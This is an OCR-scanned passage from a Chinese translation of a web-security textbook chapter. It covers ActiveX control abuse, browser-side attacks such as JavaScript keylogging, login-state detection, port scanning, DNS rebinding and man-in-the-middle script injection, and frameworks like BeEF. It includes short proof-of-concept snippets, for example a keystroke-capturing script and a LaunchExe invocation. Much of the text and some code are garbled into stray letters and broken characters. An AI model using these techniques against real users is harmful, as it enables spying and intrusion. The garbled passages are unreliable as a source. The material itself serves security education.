其 他 客户 端 存 储 机 制 ， 如 HIML5 即 将 引入 的 新 功能 ， 将 为 应 用 程 
序 提 供 实 施 重 要 功能 的 机 会 ， 包 括 更 快速 地 访问 特定 的 用 户 数据 ， 并 能 
够 在 网 络 访问 不 可 用 时 继续 工作 。 如 果 需 要 在 本 地 存储 敏感 数据 ， 最 好 
是 对 这 些 数据 进行 加 密 ， 以 防止 攻击 者 直接 访问 它们 。 此 外 ， 应 告知 用 
户 存储 在 本 地 的 数据 的 本 质 ， 回 他 们 警告 攻击 者 本 地 访问 这 些 数据 的 风 
险 ， 以 便 其 在 需要 时 禁用 此 功能 。 





13.6 IvihActivext? 


如 我 们 在 第 5 章 中 所 述 ， 应 用 程序 可 以 使 用 各 种 厚 客 户 端 技术 将 它 
的 一 些 处 理 操作 分 配给 客户 端 完成 。ActiveX 控 件 对 于 针对 其 他 用 户 的 
攻击 者 特别 有 用 。 如 果 应 用 程序 安装 了 一 个 可 从 上 自己 的 页 面 调 用 的 控 
件 ， 该 控件 必须 注册 为 “脚本 执行 安全 ”。 这 样 ， 用 户 访问 的 任何 其 他 
Web 站 点 都 能 够 使 用 这 个 控件 。 

通常 ， 浏 览 器 并 不 接受 Web 站 点 要 求 它们 安装 的 任何 ActiveX 控 
件 。 默 认 情 况 下 ， 当 Web 站 点 试图 安装 某 个 控件 时 ， 浏 览 器 会 显示 一 个 
安全 警报 ， 要 求 得 到 用 户 许可 。 是 否 信任 发 布 该 控件 的 Web 站 点 以 及 是 
否 允 许 安 装 该 控件 ， 将 由 用 户 自行 决定 。 但 是 ， 如 果 用 户 安 装 该 控件 ， 
ee i a 
We yi o 

ActiveX ZAF Ps SLA AAA EY des led SE 22 PK 

口 由 于 ActiveX 控 件 通 常 以 C/C++ 之 类 的 本 地 语言 编写 ， 它 们 之 中 很 
可 能 存在 一 些 典 型 的 软件 漏洞 ， 如 缓冲 区 溢出 、 整 数 漏洞 以 及 格式 字符 
串 漏洞 (请 参阅 第 16 章 了 解 详情 ) 。 人 们 已 经 在 流行 Web 应 用 程序 (如 
在 线 赌博 站 点 〉 发 布 的 ActiveX 控 件 中 发 现 了 大 量 这 些 类 型 的 漏洞 。 通 
常 ， 攻 击 者 可 以 利用 这 些 漏 润 在 受害 用 户 的 计算 机 上 执行 任意 代码 。 
口 许 多 ActiveX 控 件 中 包含 一 些 本 质 上 存在 风险 、 易 被 滥用 的 方 
法 。 


























m LaunchExe(BSTR ExeName) 

m SaveFile(BSTR FileName, BSTR Url) 
m LoadLibrary(BSTR LibraryPath) 

m ExecuteCommand(BSTR Command) 








开发 者 往往 会 执行 这 些 方 法 来 提高 控件 的 灵活 性 ， 以 便于 将 来 扩展 
控件 的 功能 ， 而 不 必 部 闭 全 新 的 控件 。 但 是 ， 一 旦 安装 了 这 些 控件 ， 任 
何 恶意 站 点 当然 也 可 以 通过 同样 的 方式 对 其 进行 书展”， 从 而 执行 针对 
用 户 的 恶意 操作 。 








当 应 用 程序 安装 ActiveX 控 件 时 ， 除 浏览 圳 会 显示 一 个 要 求 获得 安 
装 控件 许可 的 警报 外 ， 还 应 该 可 以 在 某 个 应 用 程序 页 面 的 HTML 源 代码 
中 看 到 类 似 于 下 面 的 代码 : 


<object id="oMyObject" 
classid="CLSID:A61BC839-5188-4AE9-76AF-109016FD8901" 
codebase="https://wahh-app.com/bin/myobject.cab”"> 
</object> 


这 段 代 码 告 诉 浏览 器 用 指定 的 名 称 和 classid 示 例 化 ActiveX 控 件 ， 并 
从 指定 的 URL 下 载 该 控件 。 如 果 浏 览 器 中 己 经 安装 有 控件 ， 就 不 需要 使 
E E 
到 该 控 

如 果 用 户 允 许 安 装 这 个 控件 ， 浏 览 器 会 将 其 注册 为 “脚本 执行 安 
全 ”。 这 意味 着 将 来 任何 Web 站 点 都 可 以 将 其 示例 化 ， 并 调用 它 的 方 
法 。 可 以 通过 检查 注册 表 项 HKEY_ CLASSES_ROOTACLSID\ 从 上 面 的 
HTML 中 提取 的 控件 classid\Implemented Categories 确 认 这 一 点 。 如 果 其 
中 存在 子 注 册 表 项 7DD95801-9882-11CF-9FA9-00AA006C42C4， 则 表示 
该 控件 已 经 注册 为 “脚本 执行 安全 ”， 如 图 13-6 所 示 。 
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My Computer\HKEY_CLASSES_ROOT\CLSID\{0C L6C27E-A6E7-1 1D0-BFC3-0020F800802$}\Implamented Categories|\{7DD9S6801-S 4 





图 13-6 ”已 注册 为 "脚本 执行 安全 ”的 控件 





i 浏览 器 示例 化 ActiveX 控 件 后 ， 就 可 以 通过 以 下 脚本 调用 它 的 方 
TE: 


<script> 
document. oMyObject. LaunchExe ( 'myAppDemo.exe'); 
</script> 


渗透 测 试 步 又 


一 种 探查 ActiveX 漏 洞 的 简单 方法 是 ， 修 改 调用 该 控件 的 
HTML 代 码 ， 问 其 提交 自己 的 参数 ， 然 后 监控 执行 结果 。 

(1) 使 用 第 16 章 摘 述 的 相同 攻击 有 效 载 集 可 探查 缓冲 区 洲 出 
之 类 的 漏洞 。 如 果 以 不 受 控制 的 方式 触发 这 种 漏洞 ， 很 可 能 会 导致 
负责 该 控件 执行 的 浏览 器 进程 朋 尝 。 

(2) 本质 上 存在 风险 的 方法 通过 其 名 称 即 可 确定 ， 如 
LaunchExe。 在 其 他 情况 下 ， 控 件 名 称 可 能 无 害 或 含义 模糊 ， 但 有 
时 ， 一 些 有 用 的 数据 ， 如 文件 名 、UREL 或 系统 命令 ， 明 显 被 用 作 控 
件 的 参数 。 应 该 尝试 将 这 些 参数 修改 为 任意 值 ， 确 定 控 件 是 否 按 预 
计 的 方式 处 理 输入 。 


我 们 和 常常 发 现 ， 应 用 程序 并 没有 调用 控件 的 所 有 方法 。 例 如 ， 一 些 
方法 主要 用 于 测试 目的 、 一 些 已 被 取代 但 尚未 删除 、 一 些 可 能 是 为 了 方 
便 将 来 使 用 或 用 于 自我 更 新 目的 。 为 了 对 控件 进行 综合 测试 ， 有 必要 枚 
rt cree re een 
测试 。 

有 各 种 工具 可 用 于 枚 举 和 测试 ActiveX 控 件 方法 。iDefense 开 发 的 
COMRaider 就 是 一 个 有 用 的 工具 ， 它 能 够 显示 一 个 控件 的 全 部 方法 ， 并 
对 每 个 方法 执行 基本 的 模糊 测试 ， 如 图 13-7 所 示 。 
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保护 本 地 编译 软件 组 件 的 安全 ， 防 止 其 受到 攻击 ， 是 一 个 广泛 而 复 
杂 的 话题 ， 这 不 属于 本 书 的 讨论 范围 。 基 本 上 ，ActiveX 控 件 的 设计 者 
与 开发 者 必须 确保 恶意 Web 站 点 无 法 调用 该 控件 实施 的 方法 ， 用 以 对 安 
装 这 个 控件 的 用 户 执 行 恶 意 操 作 。 以 下 是 一 些 应 该 注意 的 问题 。 

口 应 对 控件 进行 以 安全 为 中 心 的 源 代码 审查 与 渗透 测试 ， 以 确定 缓 
冲 区 洲 出 之 类 的 漏洞 。 

口 控件 不 得 暴露 任何 使 用 用 户 可 控制 的 输入 调用 外 部 文件 系统 或 操 
作 系 统 、 本 质 上 存在 风险 的 方法 。 只 需 稍微 做 出 一 些 努 力 ， 就 可 以 找到 
更 安全 的 奉 代 方法 。 例 如 ， 如 果 有 必要 启动 外 部 进程 ， 则 应 编辑 一 个 列 
表 ， 列 出 所 有 可 合法 、 安 全 启动 的 外 部 进程 ;然后 创建 单独 的 方法 调用 
每 个 进程 ， 或 者 使 用 一 个 方法 提取 这 个 列表 中 的 索引 号 。 

为 进行 深层 防御 ， 一 些 ActiveX 控 件 对 发 布 HTML 页 面 (这些 控件 








即 从 中 调用 ) 的 域名 进行 确认 。Microsoft 的 “SiteLock 活 动 模板 库 ? 模 板 
允许 开发 者 将 ActiveX 控 件 仅 限 于 特定 的 域名 列表 。 

一 些 控 件 甚至 更 进一步 ， 要 求 提 交 给 它们 的 所 有 参数 必须 使 用 加 密 
签名 。 如 果 提 交 的 签名 无 效 ， 控 件 不 会 执行 请 求 的 操作 。 还 要 注意 ， 如 
果 人 允许 调用 这 些 控件 的 web 站 点 存在 任何 XSS 漏 洞 ， 那 么 攻击 者 束 有 可 
能 突破 这 类 防御 。 





13.7 Wri Wl as 


迄今 为 止 ， 我 们 在 这 一 章 和 上 一 章 介 绍 的 攻击 主要 与 利用 应 用 程序 
的 某 种 行为 特征 攻破 应 用 程序 用 户 有 关 。 虽 然 某 些 攻击 技巧 需要 利用 特 
EN as AY PRE, (Eek AAAS. Penk ca ok E LA Xe JavaScript FZ 
类 的 攻击 全 都 源 于 特定 Web 应 用 程序 中 的 漏洞 。 

另 一 类 针对 用 户 的 攻击 并 不 依赖 于 特定 应 用 程序 的 行为 。 相 反 ， 这 
些 攻击 主要 利用 浏览 右 的 行为 特征 ， 或 者 核心 Web 技 术 本 喘 的 设计 缺 
陶 。 这 些 攻击 可 能 由 任何 恶意 网 站 或 任何 本 身 已 被 攻破 的 “良性 ”站 点 实 
施 。 介 绍 Web 应 用 程序 攻击 的 书籍 通常 都 没有 涉及 这 类 攻击 。 但 是 ， 我 
们 有 必要 简单 了 解 这 些 攻击 ， 部 分 是 因为 它们 与 利用 应 用 程序 特定 功能 
的 攻击 的 某 些 特点 相同 。 通 过 展示 在 不 存在 任何 应 用 程序 特定 漏洞 的 情 
况 下 ， 攻 击 者 可 以 达到 什么 上 目的， 这些 攻击 还 为 我 们 了 解 各 种 应 用 程序 
行为 的 影响 提供 了 相关 信息 。 

以 下 各 部 分 的 介绍 相对 比较 简单 。 有 关 这 方面 的 主题 ， 可 以 写成 一 
本 书 。 拥 有 大 量 空余 时 间 的 准 作 者 可 以 同 Wiley 提 交 出 版 The Browser 
Hacker’s Handbook 的 提议 。 


13.7.1 记录 键 击 


JavaScript 可 在 浏览 器 窗口 处 于 激活 状态 时 监控 用 户 按 下 的 所 有 键 ， 
包括 密码 、 私 人 消息 和 其 他 个 人 信息 。 下 面 的 概念 验证 脚本 将 截获 
Internet Explorer 中 的 所 有 键 击 ， 并 在 浏览 器 的 状态 栏 中 显示 全 部 内 容 : 


<script>document.onkeypress = function () { 











window.status += String. fromCharCode (window. event .keyCode}; 
} </script> 

AA HEIT EXISTE TB ASI, HE CT AE TH aR BE 
dro HÆ, MARTE R A IM AUHEAR A RA S BZA DPB TE 
序 ， 某 些 应 用 程序 可 能 易于 受到 键 击 记录 攻击 。 在 所 谓 的 “ 逆 癌 键 击 劫 
持 ” 攻 击 中 ， 在 子 框架 中 运行 的 恶意 代码 能 够 夺取 顶层 窗口 的 控制 权 ， 
因为 同 源 策 略 并 不 能 阻止 这 种 操作 。 恶 意 代码 可 以 通过 处 理 onkeydown 
事件 来 捕获 键 击 ， 并 且 能 够 将 单独 的 onkeypress 事 件 传 递 给 顶层 窗口 。 
这 样 ， 输 入 的 文本 仍然 会 在 顶层 窗口 中 正常 显示 。 通 过 在 和 暂停 输入 时 和 暂 
se is 恶意 代码 甚至 可 以 在 顶层 窗口 内 的 正常 位 置 保留 显示 
闪烁 的 光标 。 



































JavaScript) H FHER Te, AAA A aV TA AB = 7 a A bA 
及 他 们 在 常用 搜索 引擎 上 执行 的 查询 。 在 介绍 蛮 力 攻击 〈 实 施 此 攻击 的 
目的 ， 是 为 了 确定 可 在 其 他 域 上 使 用 的 有 效 反 CSRE 令 牌 ) 时 ， 我 们 已 
经 讨论 了 这 种 技巧 。 攻 击 者 可 以 动态 创建 第 用 Web 站 点 以 及 搜索 查询 的 
超 链接 ， 并 使 用 getComputedStyle API 检 查 这 些 链 接 是 否 以 彩色 标记 
为 “已 被 访问 ”， 从 而 完成 这 项 任务 。 而 且 ， 攻 击 者 可 以 迅速 检查 大 量 可 
能 的 目标 ， 而 不 会 给 用 户 造 成 很 大 的 影响 。 

















JavaScript 可 用 于 确定 用 户 当 前 是 否 登 录 到 第 三 方 Web 应 用 程序 。 大 
多 数 应 用 程序 都 包含 只 有 登录 用 户 可 查看 的 页 面 ， 如 “用 户 资 料 ” 页 面 。 
如 果 未 通过 验证 的 用 户 请 求 这 个 页 面 ， 将 会 收 到 错误 消息 ， 或 者 一 个 转 
同 登 录 页 面 的 重 定 同 链接 。 

通过 对 受 保护 的 页 面 执 行 跨 域 脚本 包含 ， 并 运行 定制 的 错误 处 理 程 
种 行为 可 确定 用 户 是 否 已 经 登录 第 三 方 Web 应 用 程 
T: 








<script src="https://other-app.com/MyDetails.aspx"></script> 

当然 ， 无 论 受 保护 的 页 面 处 于 什么 状态 ， 由 于 它 仅 包 含 HTML 内 
容 ， 因 此 这 时 将 会 出 现 一 个 JavaScript 错 误 。 重 要 的 是 ， 根 据 实际 返回 的 
HTML 文 档 ， 该 错误 将 包含 不 同 的 行 写 与 错误 类 型 。 接 下 来 ， 攻 击 者 可 
以 运行 错误 处 理 程序 〈 在 fingerprint 函 数 中 ) ， 检 查 用 户 登 录 时 产生 的 
行 号 与 错误 类 型 。 尽 管 应 用 程序 实施 了 同 源 策 略 ， 但 攻击 者 的 脚本 仍然 
能 够 推断 出 受 保护 页 面 的 状态 。 

确定 用 户 当 前 登录 哪些 常用 的 第 三 方 应 用 程序 后 ， 攻 击 者 就 可 以 执 
行 针 对 性 极 强 的 路 站 点 请 求 伪造 攻击 ， 以 被 攻破 的 用 户 号 份 在 应 用 程序 
中 执行 任意 操作 。 


13.7.4 ”端口 扫描 


JavaScript 可 对 用 户 本 地 网 络 或 其 他 可 访问 的 网 络 上 的 主机 进行 端口 
扫描 ， 以 确定 可 被 利用 的 服务 。 如 果 用 户 受到 企业 或 家 庭 防火 墙 的 保 
护 ， 攻 击 者 将 能 够 到 达 无 法 通过 公共 互联 网 访问 的 服务 。 如 果 攻 击 者 扫 
摘 客户 端 计算 机 的 回环 接口 ， 就 能 够 各 开 用 户 安 装 的 任何 个 人 防火 墙 。 




















基于 浏览 器 的 端口 扫描 可 使 用 Java applet 确 定 用 户 的 IP 地 址 (可 能 
进行 了 网 络 地 址 转换 ) ， 从 而 推断 出 本 地 网 络 的 IP 范 围 。 然 后 ， HRX 
试 与 任意 主机 和 端口 建立 连接 ， 以 测试 连通 性 。 如 前 所 述 ， 同 源 策 略 阻 
止 脚本 处 理 这 些 请 求 的 啊 应 。 但 是 ， 在 检测 登录 状态 时 使 用 的 相似 技巧 
也 可 用 于 测试 网 络 连 通 性 。 这 时 ， 攻 击 者 的 脚本 尝试 从 每 个 目标 主机 和 

端口 动态 加 载 并 执行 一 段 脚本 。 如 果 那 个 端口 上 有 Web 服 务 器 正在 运 
E, 它 将 返回 HIML 或 其 他 一 些 内 容 ， 生 成 端口 扫描 脚本 能 够 检测 到 的 
JavaScript 错 误 。 人 否则 ， 连 接 尝 试 将 会 超时 或 不 返回 任何 数据 ， 在 这 种 情 
况 下 不 会 导致 错误 。 因 此 ， 尽 管 应 用 程序 实施 同 源 限制 ， 问 口 扫 摘 脚 本 
仍然 能 够 确定 任意 主机 和 端口 的 连通 性 。 

请 注意 ， 大 多 数 浏览 器 都 在 可 以 使 用 HTTP 访 问 的 端 口上 实施 了 限 
制 ， 并 阻止 了 其 他 主要 服务 常用 的 端口 (如 用 于 SMTP 的 端口 25〉。 但 
是 ， 通 过 利用 相关 漏洞 ， 可 以 突破 这 些 浏览 器 实施 的 限制 。 














成 功 使 用 端口 扫描 确定 其 他 主机 后 ， 就 可 以 使 用 一 段 恶 音 脚 本 尝试 
标识 每 一 个 发 现 的 服务 ， 然 后 通过 各 种 方法 实施 攻击 。 

许多 Web 服 务 器 包含 位 于 特殊 URL 位 置 的 图 像 文件 。 下 面 的 代码 检 
查 一 幅 与 一 EN 


<img sre="attp://192. L/hm_icon.gi onerror="notNetcear({) "> 


Row 则 说 明 服 务 器 已 被 戌 功 标 识 为 
NETGEAR 路 由 器 。 接 下 来 ， Preece eG a me 
洞 ， 或 执行 请 求 伪 造 攻击 ， 继 续 攻 击 Web 服 务 器 。 在 本 示例 中 ， 攻 击 者 
a e 并 对 路 由 器 进行 重新 配置 ， 以 打开 
其 外 部 接口 上 的 其 他 端口 ， 或 向 外 界 披露 它 的 管理 功能 。 注 意 ， 许 多 这 
种 非常 有 效 的 攻击 只 需要 提出 任意 请 求 ， 而 不 需要 处 理 它们 的 响应 ， 因 
此 不 会 受到 同 源 策略 的 限制 。 

在 某 些 情况 下 ， 攻 击 者 可 以 利用 DNS 重新 绑 定 (DNS rebinding) 技 
巧 违反 同 源 策略 ， 从 本 地 网 络 中 的 Web 服 务 器 中 检索 内 容 。 这 些 攻击 将 
在 本 章 后 面 讨论 。 


13.7.6 Ñ! HTTP 服 务 
除 针对 Web 服 务 器 实施 攻击 外 ， 有 些 情况 下 还 可 以 利用 用 户 的 浏览 


器 、 针 对 可 以 从 用 户 的 计算 机 访问 的 非 HITP 服 务实 施 攻击 。 只 有 所 攻 
击 的 服务 接受 必然 会 在 每 个 请 求 的 开头 出 现 的 HTTP 消 息 头 ， 攻 击 者 就 








可 以 在 消息 主体 中 发 送 任意 二 进 制 内 容 ， 从 而 与 非 HITP 服 务 进行 交 
互 。 实 际 上 ， 许 多 网 络 服务 都 接受 无 法 识别 的 输入 ， 并 仍然 处 理 随 后 针 
对 相关 协议 而 构造 的 输入 。 

我 们 已 在 第 12 章 介绍 了 一 种 路 域 发 送 任意 消息 主体 的 技巧 ， 该 技巧 
使 用 HTML 表 单 〈 其 enctype 属 性 设置 为 textplain) 回 易 受 攻 击 的 应 用 程 
序 发 送 XML 内 容 。 下 面 的 论文 介绍 了 实施 这 类 攻击 的 其 他 技巧 : 

www.ngssoftware.com/research/papers/InterProtocolExploitation.pdf 

这 类 协议 间 攻 击 可 对 目标 服务 实施 未 授权 操作 ， 或 利用 该 服务 内 的 
代码 级 漏洞 来 攻破 目标 服务 器 。 

此 外 ， 在 茶 些 情况 下 ， 还 可 以 对 非 HITTP 服 务 行为 加 以 利用 ， 针 对 
在 同一 服务 器 上 运行 的 Web 应 用 程序 实施 XSS 攻 击 。 要 实施 这 种 攻击 ， 
必须 满足 以 下 条 件 。 

口 非 HTTP 服务 必须 在 未 被 浏览 器 阻止 的 端口 上 运行 《如 前 所 








述 ) 





I 非 HTTP 必 须 接受 浏览 器 发 送 的 意外 HTTP 消 息 头 ， 而 不 仅仅 是 在 
出 现 这 种 情况 时 关闭 网 络 连接 。 许 多 服务 都 接受 意外 HTTP 消 息 头 ， 特 


别 是 那些 基于 文本 的 服务 。 
O 非 HTTP 服 务必 须 在 其 响应 中 (如 在 错误 消息 中 ) 回 显 一 部 分 请 
RAR. 


口 浏览 器 必须 接受 不 包含 有 效 HTTP 消 息 头 的 响应 ， 并 且 必 须 将 一 
部 分 响应 作为 HIML 处 理 〈 如 果 响 应 中 包含 HTML ) 。 实 际 上 ， 在 收 到 
合适 的 非 HTTP 响 应 时 ， 所 有 最 新 版 本 的 浏览 器 都 以 这 种 方式 进行 处 理 
(可 能 是 为 了 向 后 兼容 ) 。 

口 在 隔离 域 源 访问 cookie 时 ， 浏 览 器 必须 忽略 端口 号 。 确 实 ， 在 处 
理 cookie 时 ， 当 前 浏览 器 会 忽略 端口 。 

如 果 满 足 这 些 条 件 ， 攻 击 者 就 可 以 构建 针对 非 HITP 服 务 的 XSS 攻 





击 。 要 实施 这 种 攻击 ， 需 要 以 正常 方式 在 URL 或 消 恩 主体 中 发 送 专 门 设 
计 的 请 求 。 然 后 ， 请 求 中 包含 的 脚本 代码 将 被 回 显 ， 并 在 用 户 的 浏览 器 
中 执行 。 该 代码 可 以 从 非 HTTP 服 务 所 在 的 域 中 读 取 用 户 的 cookie， 然 后 
将 这 些 cookie 传 送 给 攻击 者 。 





如 果 用 户 的 浏览 吉 或 任何 安装 的 扩展 存在 漏洞 ， 攻 击 者 就 可 以 通过 
恶意 JavaScript 或 HTML 代 码 利用 这 些 漏洞 。 茶 些 情况 下 ， 攻 击 者 可 以 利 
用 Java 虚 拟 机 之 类 的 扩展 中 的 漏洞 、 与 本 地 计算 机 或 其 他 位 置 上 的 非 
HTTP 服 务 进行 双 同 二 进 制 通信 。 这 样 ， 攻 击 者 就 可 以 利用 通过 端口 扫 





描 确 定 的 存在 于 其 他 服务 中 的 漏洞 。 许 多 软件 产品 〈 包 括 并 非 基 于 浏览 
器 的 产品 ) 还 安装 了 可 能 包含 漏洞 的 ActiveX 控 件 。 


13.7.8 DNS 重新 绑 定 


DNS 重新 绑 定 (DNS rebinding) 是 一 种 在 某 些 情 况 下 可 部 分 违反 同 
源 策略 ， 从 而 允许 恶意 Web 站 点 与 其 他 域 进行 交互 的 技术 。 之 所 以 能 够 
实施 这 种 攻击 ， 是 因为 同 源 策略 主要 基于 域名 进行 隔离 ， 而 最 终 传送 
HTTP 请 求 则 需要 将 域名 转换 为 IP 地 址 。 

整体 看 来 ， 这 种 攻击 的 过 程 如 下 。 

o 用户 访问 攻击 者 域 上 的 恶意 Web 页 面 。 为 检索 此 页 面 ， 用 户 的 浏 
览 器 会 将 攻击 者 的 域名 解析 为 攻击 者 的 IP 地 址 。 

口 攻 击 者 的 Web 页 面向 攻击 者 的 域 提 出 Ajax 请 求 〈 同 源 策 略 允 许 这 
种 行为 ) 。 攻 击 者 利用 DNS 重新 绑 定 确保 浏览 器 再 次 解析 攻击 者 的 域 ， 
在 这 次 解析 过 程 中 ， 域 名 将 解析 为 攻击 者 所 针对 的 第 三 方 应 用 程序 的 IP 


地 址 。 

口 随 后 针对 攻击 者 的 域名 提出 的 请 求 将 被 发 送 到 目标 应 用 程序 。 由 
于 这 些 请 求 与 攻击 者 的 原始 页 面 在 同一 个 域 上 ， 因 此 ， 同 源 策 略 允 许 攻 
击 者 的 代码 检索 目标 应 用 程序 返回 的 请 求 的 内 容 ， 并 将 这 些 内 容 返 还 给 
攻击 者 《可 能 位 于 受 其 控制 的 其 他 域 上 ) 。 

实施 这 种 攻击 将 面临 各 种 阻碍 ， 包 括 一 些 浏览 器 为 继续 使 用 以 前 解 
析 的 耳 地 址 〈 即 使 域 已 被 重新 绑 定 到 其 他 地 址 ) 而 采用 的 机 制 。 此 外 ， 
浏览 器 发 送 的 Host 消 息 头 仍然 会 引用 攻击 者 的 域 ， 而 不 是 可 能 会 导致 问 
题 的 目标 应 用 程序 的 域 。 之 前 ， 攻 击 者 可 以 利用 一 些 方法 在 各 种 浏览 器 
上 突破 这 些 阻碍 。 除 浏览 器 外 ， 还 可 以 针对 浏览 器 扩展 和 Web 人 代理 实施 
| 
“ 同 。 

请 注意 ， 在 DNS 重新 绑 定 攻击 中 ， 就 浏览 器 而 言 ， 针 对 目标 应 用 程 
序 的 请 求 仍 然 在 攻击 者 的 域 中 提出 。 因 此 ， 这 些 请 求 中 不 会 包含 目标 应 
用 程序 所 在 的 域 的 任何 cookie。 为 此 ， 攻 击 者 可 以 通过 DNS 重新 绑 定 从 
目标 应 用 程序 检索 到 的 内 容 ， 与 任何 可 以 直接 向 目标 应 用 程序 提出 请 求 
的 用 户 能 够 检索 到 的 内 容 相 同 。 因 此 ， 这 种 技巧 在 目标 应 用 程序 已 实施 
了 其 他 控制 来 防止 攻击 者 直接 与 其 进行 交互 的 情况 下 尤其 有 用 。 例 如 ， 
如 果 用 户 处 在 无 法 通过 互联 网 直接 访问 的 组 织 内 部 网 络 中 ， 攻 击 者 可 以 
ee Ue Nea ere ah ieee Vel etl aes 


























13.7.9 jh ds Fil H HEE 


MAF ACHE EAR ， 用 以 演示 和 利用 各 种 针对 因特网 终端 用 户 
的 攻击 。 这 些 框架 通常 需要 通过 某 种 漏洞 (如 XSS) ， 在 受害 者 的 浏览 
器 中 放 入 一 个 JavaScript 钧 子 (hook) 。 放 置 钓 子 后 ， 浏 览 器 就 会 与 攻击 
者 控制 的 服务 器 建立 联系 。 浏 览 器 会 定期 访问 这 个 服务 器 ， 网 攻击 者 提 
交 数 据 ， 同 时 提供 一 个 控制 信道 ， 方 便 接 收 攻击 者 发 出 的 命令 。 








= 

wy 

=> 注解 ”尽管 同 源 集 略 实 施 了 各 种 限制 ， 但 在 这 种 情况 下 ， 
攻击 者 仍然 可 以 利用 各 种 技巧 、 通 过 已 注入 到 目标 应 用 程序 中 的 脚 
本 与 其 控制 的 服务 器 进行 双 问 异步 交互 。 一 种 简单 的 方法 是 对 目 己 
的 域 实施 动态 跨 域 脚本 包含 。 这 些 请 求 能 够 向 攻 击 者 提交 截获 的 数 
te CEURLAW FAT) ， 并 接收 有 关 应 执行 的 操作 的 指令 在 
返回 的 脚本 代码 中 ) 。 


以 下 是 可 以 在 这 种 类 型 的 框架 中 执行 的 一 些 操作 : 

口 记录 键 击 并 回 攻 击 者 发 送 这 些 内 容 ; 

O 劫持 用 户 访问 易 受 攻击 的 应 用 程序 的 会 话 ; 

口 “指纹” 识别 受害 者 的 浏览 器 ， 从 而 利用 己 知 的 浏览 器 漏洞 ; 

口 对 其 他 主机 (位 于 被 攻破 的 用 户 浏览 器 能 够 访问 的 私有 网 络 中 ) 
行 端口 扫描 ， 并 辐 攻 击 者 传送 扫描 结果 ; 

口 通 过 迫使 浏览 器 发 送 恶 意 请 求 ， 可 对 借助 被 攻破 的 用 户 浏 览 器 访 
问 的 其 他 Web 应 用 程序 实施 攻击 ; 

口 对 用 户 的 浏览 历史 记录 实施 蛮 力 攻击 ， 并 将 结果 送 交 给 攻击 者 。 
BeEF 是 一 个 只 型 的 综合 型 浏览 器 利用 框架 ， 它 由 WwWade Alcon}? 
发 ， 能 够 执行 上 述 功能 图 13-8 说 明了 BeEF 如 何 截取 一 名 被 攻破 用 户 的 
半 息 ， 包 括 计算 机 的 相关 资料 、 当 前 显示 的 URL 与 页 面 内 容 ， 以 及 用 户 
输入 的 键 击 。 
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Details 
Browser 
Internet Explorer 5.01 
Operating System 
Windows 98 
Screen 
1280x800 with 24-bit colour 
URL 
http://localhost/beef/hook/xss-example. htm 
Cookie 
BeEFS ession=99f42a3792c31c94f85387a4d360a618 


Page Content 
Content 
The main page more content 


Key Logger 
Keys 
my keys are logged 


Module Results 
Results 
OK Clicked 





图 13-8 ”利用 BeEF 从 一 名 被 攻破 的 用 户 截 取 的 数据 


图 13-9 显 示 BeEF 正 对 受害 用 户 的 计算 机 进行 端口 扫描 。 
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图 13-9 BeEF 正 对 一 名 被 攻破 的 用 户 计 算 机 进行 端口 扫描 


XSS Shell 是 男 外 一 个 功能 非常 强大 的 浏览 占 利 用 框架 ， 它 由 Ferrruh 
Mavituna 开 发 。 这 个 框架 提供 一 系列 功能 ， 可 控制 通过 XSS 攻 破 的 僵尸 
主机 (zombie host) ， 包 括 和 截获 键 击 、 剪 贴 板 内 容 、 鼠 标 移 动 、 屏 幕 截 
图 、UREL 历史 记录 ， 以 及 注入 任意 JavaScript 命 令 。 即 使 导航 到 应 用 程序 
的 其 他 页 面 ， 它 还 会 驻 留 在 用 户 的 浏览 器 中 。 


13.7.10 LAL 


我 们 在 前 几 章 中 讲 到 ， 如 果 应 用 程序 使 用 未 加 密 HITP 通 信 ， 则 位 
于 适当 位 置 的 攻击 者 可 以 通过 各 种 方式 拦截 敏感 数据 ， 如 密码 和 会 话 令 
牌 。 更 令 人 惊奇 的 是 ， 即 使 应 用 程序 使 用 HTTPS 传 输 所 有 敏感 数据 ， 并 
且 目 标 用 户 始终 验证 是 否 正 确 使 用 了 HTTPS， 攻 击 者 仍然 能 够 实施 一 些 
严重 的 攻击 。 

这 类 攻击 称 为 “中间 人 ”攻击 。 
的 流量 ， 而 且 会 动态 更 改革 些 流 量 。 这 类 攻击 往往 更 加 复杂 ， 但 确实 可 
以 在 各 种 常见 的 情形 《包括 无 线 公 导 热点 和 共享 的 办 公 网 络 》 中 实施。 

许多 应 用 程序 使 用 HTTP 传 输 非 敏感 数据 ， 如 产品 说 明和 帮助 页 
面 。 如 果 这 些 内 容 使 用 绝对 UREL 实 现任 何 脚 本 包含 ， 攻 击 者 就 可 以 利用 
主动 中 间 人 攻击 攻破 同一 域 上 受 HTTPS 保 护 的 请 求 。 例 如 ， 某 应 用 程序 
的 帮助 页 面 可 能 包含 以 下 代码 : 


<script src="http://wahh-app.com/help.js"></script> 


目前 ， 许 多 知名 Web 应 用 程序 都 采用 这 种 行为 ， 即 使 用 绝对 URL 包 
含 通 过 HTTP 传 送 的 脚本 。 在 这 种 情况 下 ， 活 跃 的 中 间 人 攻击 者 当然 可 











以 通过 修改 任何 HTTP 响 应 来 执行 任意 脚本 代码 。 但 是 ， 由 于 同 源 策略 
通常 会 将 通过 HTTP 和 HTTPS 加 载 的 内 容 视 为 属于 不 同 来 源 ， 攻 击 者 并 
不 能 利用 这 种 攻击 截获 使 用 HTTPS 访 问 的 内 容 。 

为 克服 这 种 障碍 ， 攻 击 者 可 以 通过 修改 任何 HTTP 响 应 来 构建 重 定 
问 ， 或 在 其 他 响应 中 重 写 链接 目标 ， 从 而 诱 使 用 户 通过 HTTPS 加 载 同 一 
页 面 。 当 用 户 通过 HTTPS 加 载 帮 助 页 面 时 ， 其 浏览 器 将 使 用 HTTP 执 行 
旨 定 的 脚本 包含 。 令 人 遗憾 的 是 ， 一 些 浏览 器 在 这 种 情况 下 并 不 显示 任 
何 和 警告。 然后， 攻击 者 可 以 在 包含 脚本 的 响应 中 返回 任意 脚本 代码 。 该 
脚本 将 在 HTTPS 啊 应 中 执行 ， 允 许 攻击 者 截获 通过 HTTPS 访 问 的 所 有 内 
PN 


即使 所 攻击 的 应 用 程序 并 不 使 用 普通 HITP 传 送 任何 内 容 ， 但 攻击 
者 仍然 可 以 通过 向 任何 其 他 域 提出 HTTP 请 求 来 返回 重 定 向 ， 从 而 诱 使 
用 户 使 用 普通 HTTP 向 目标 域 提 出 请 求 。 虽 然 应 用 程序 本 身 可 能 不 会 监 
听 端 口 80 上 的 HTTP 请求， 但 攻击 者 可 以 拦截 这 些 诱发 的 请 求 ， 并 在 这 
